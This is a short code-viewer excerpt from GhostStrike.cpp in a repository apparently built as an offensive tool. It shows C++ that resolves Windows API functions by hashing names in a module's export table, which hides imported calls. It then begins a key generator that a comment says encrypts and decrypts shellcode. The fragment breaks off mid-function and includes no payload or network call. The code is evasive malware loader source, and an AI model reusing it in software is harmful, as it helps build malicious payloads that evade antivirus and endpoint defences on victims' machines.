INNER CODE UNIT · C++

ordinals

stivenhacker/GhostStrike · GhostStrike.cpp:93

    WORD* ordinals = (WORD*)((BYTE*)module + export_dir->AddressOfNameOrdinals);
    DWORD* names = (DWORD*)((BYTE*)module + export_dir->AddressOfNames);

    // Loop through the export table to find the function by its hash.
    for (DWORD i = 0; i < export_dir->NumberOfNames; ++i) {
        const char* func_name = (const char*)((BYTE*)module + names[i]);
        if (hash_function(func_name) == function_hash) {
            return (FARPROC)((BYTE*)module + functions[ordinals[i]]);
        }
    }

    std::cerr << "Error retrieving the function address.\n";
    exit(EXIT_FAILURE);
}

// Generates a cryptographically secure key of the specified length.
// This key will be used to encrypt and decrypt the shellcode.
std::vector<unsigned char> generate_key(SIZE_T length) {

View source record →

📰 Research Paper
Loading…
⏳ Fetching content…